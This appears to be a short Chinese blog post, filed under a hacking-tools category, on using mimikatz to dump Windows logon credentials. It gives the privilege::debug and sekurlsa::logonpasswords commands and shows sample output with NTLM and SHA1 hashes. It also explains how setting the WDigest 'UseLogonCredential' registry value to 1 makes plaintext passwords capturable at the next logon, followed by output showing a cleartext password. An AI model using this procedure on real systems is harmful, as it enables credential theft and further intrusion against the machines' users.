- A+
所属分类:神兵利刃
2.0版本
第一条:privilege::debug
//提升权限
第二条:sekurlsa::logonpasswords
//抓取密码
默认配置是抓不到明文密码了,神器mimikatz显示Password为null
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
Authentication Id : 0 ; 121279 (00000000:0001d9bf)Session : Interactive from 1User Name : mickeyDomain : WIN-B054LAOH5FCLogon Server : WIN-B054LAOH5FCLogon Time : 2014/2/7 16:13:37SID : S-1-5-21-3697557613-2315859964-140861748-1001 msv : [00000003] Primary * Username : mickey * Domain : WIN-B054LAOH5FC * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0 * SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709 [00010000] CredentialKeys * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0 * SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709 tspkg : wdigest : * Username : mickey * Domain : WIN-B054LAOH5FC * Password : (null) kerberos : * Username : mickey * Domain : WIN-B054LAOH5FC * Password : (null) ssp : KO credman : |
需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
Authentication Id : 0 ; 2506062 (00000000:00263d4e)Session : Interactive from 2User Name : mickeyDomain : WIN-B054LAOH5FCLogon Server : WIN-B054LAOH5FCLogon Time : 2015/5/11 11:47:35SID : S-1-5-21-3697557613-2315859964-140861748-1001 msv : [00010000] CredentialKeys * NTLM : ad12521316a18d2172f20db07674c278 * SHA1 : 85b6b322a966fe19f758ee15fd7516c23c33cb7c [00000003] Primary * Username : mickey * Domain : WIN-B054LAOH5FC * NTLM : ad12521316a18d2172f20db07674c278 * SHA1 : 85b6b322a966fe19f758ee15fd7516c23c33cb7c tspkg : wdigest : * Username : mickey * Domain : WIN-B054LAOH5FC * Password : AGeisNBVeryNB@wooyun.org |
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
